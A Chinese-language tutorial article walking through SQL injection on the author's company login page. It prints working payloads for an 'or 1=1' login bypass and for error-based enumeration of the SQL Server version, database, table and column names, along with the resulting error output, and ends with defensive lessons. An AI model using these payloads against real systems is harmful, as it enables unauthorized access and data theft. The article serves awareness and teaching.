程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 數據庫知識 >> MYSQL數據庫 >> MySQL綜合教程 >> sql注入實例

sql注入實例

編輯:MySQL綜合教程

前陣子發現公司的網站有SQL注入漏洞,向項目經理提了以後,得到的答復異常的冷淡:“早就知道,這種asp的網站肯定有漏洞,要是Asp.net的網站就沒問題”,先暫不評價此說法對錯,如此冷淡的反應只能說明了對SQL注入的無知,今天就通過這個實例來告訴大家SQL注入究竟有多大的危害。
 
初步注入--繞過驗證,直接登錄
 
公司網站登陸框如下:

sql注入實例

可以看到除了賬號密碼之外,還有一個公司名的輸入框,根據輸入框的形式不難推出SQL的寫法如下:

SELECT * From Table WHERE Name='XX' and Password='YY' and Corp='ZZ';

我發現前兩者都做一些檢查,而第三個輸入框卻疏忽了,漏洞就在這裡!

注入開始,在輸入框中輸入以下內容:

sql注入實例

用戶名亂填,密碼留空,這種情況下點擊登錄按鈕後竟然成功登錄了。我們看一下最終的SQL就會找到原因:

SELECT * From Table WHERE Name='SQL inject' and Password='' and Corp='' or 1=1--';

從代碼可以看出,前一半單引號被閉合,後一半單引號被“--”給注釋掉,中間多了一個永遠成立的條件“1=1”,這就造成任何字符都能成功登錄的結果。而Sql注入的危害卻不僅僅是匿名登錄。
 
中級注入--借助異常獲取信息。
 
現在我們在第三個輸入框中寫入:“‘ or 1=(SELECT @@version) –”。如下:

sql注入實例

後台的SQL變成了這樣:

SELECT * From Table WHERE Name='SQL inject' and Password='' and Corp='' or 1=(SELECT @@VERSION)--';

判斷條件變成了 1=(SELECT @@VERSION),這個寫法肯定會導致錯誤,但出錯正是我們想要的。點擊登錄後,頁面出現以下信息:

Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (SP3) - 10.0.5500.0 (X64) Sep 21 2011 22:45:45 Copyright (c) 1988-2008 Microsoft Corporation Developer Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) ' to data type int.
 
可怕的事情出現了,服務器的操作系統和SQL Server版本信息竟然通過錯誤顯示出來。
 
危害擴大--獲取服務器所有的庫名、表名、字段名
 
接著,我們在輸入框中輸入如下信息:“t' or 1=(SELECT top 1 name FROM master..sysdatabases where name not in (SELECT top 0 name FROM master..sysdatabases))--”,此時發現第三個輸入框有字數長度的限制,然而這種客戶端的限制形同虛設,直接通過Google浏覽器就能去除。

sql注入實例

點擊登錄,返回的信息如下:

Conversion failed when converting the nvarchar value 'master' to data type int.
 
數據庫名稱“master”通過異常被顯示出來!依次改變上面SQL語句中的序號,就能得到服務器上所有數據庫的名稱。
 
接著,輸入信息如下:“b' or 1=(SELECT top 1 name FROM master..sysobjects where xtype='U' and name not in (SELECT top 1 name FROM master..sysobjects where xtype='U'))--”
 
得到返回信息如下:

Conversion failed when converting the nvarchar value 'www_phpernote_article' to data type int.
 
我們得到了master數據庫中的第一張表名:"www_phpernote_article”,同上,依次改變序號,可得到該庫全部表名。
 
現在我們以"www_phpernote_article”表為例,嘗試獲取該表中所有的字段名。在輸入框中輸入以下代碼:“b' or 1=(SELECT top 1 master..syscolumns.name FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='www_phpernote_article');”
 
於是,得到錯誤提示如下:

"Conversion failed when converting the nvarchar value 'xserver_name' to data type int.";

這樣第一個字段名“xserver_name”就出來了,依次改變序號,就能遍歷出所有的字段名。
 
最終目的--獲取數據庫中的數據
 
寫到這裡,我們已知通過SQL注入能獲取全部的數據庫,表,及其字段,為了防止本文完全淪為注入教程,獲取數據的代碼就不再描述,而這篇文章的目的也已達到,SQL注入意味著什麼?意味著數據庫中所有數據都能被盜取。
 
經驗教訓
 
關於安全性,本文可總結出一下幾點:

1.對用戶輸入的內容要時刻保持警惕。

2.只有客戶端的驗證等於沒有驗證。

3.永遠不要把服務器錯誤信息暴露給用戶。
 
除此之外,我還要補充幾點:

1.SQL注入不僅能通過輸入框,還能通過Url達到目的。

2.除了服務器錯誤頁面,還有其他辦法獲取到數據庫信息。

3.可通過軟件模擬注入行為,這種方式盜取信息的速度要比你想象中快的多。

4.漏洞跟語言平台無關,並非asp才有注入漏洞而asp.net就沒有注入漏洞,一切要看設計者是否用心。

您可能感興趣的文章

  • MySQL 當記錄不存在時插入
  • navicat for mysql 注冊碼
  • MySQL 大數據量快速插入方法和語句性能優化
  • Mysql查詢帶單引號字符串及插入帶單引號字符串需要注意問題
  • windows環境下mysql數據庫的主從同步備份步驟
  • mysql服務器主從數據庫同步配置
  • Javascript檢測用戶輸入密碼強度的效果代碼
  • PHP檢查浏覽器參數防止被SQL注入的函數

  1. 上一頁:
  2. 下一頁:
Copyright © 程式師世界 All Rights Reserved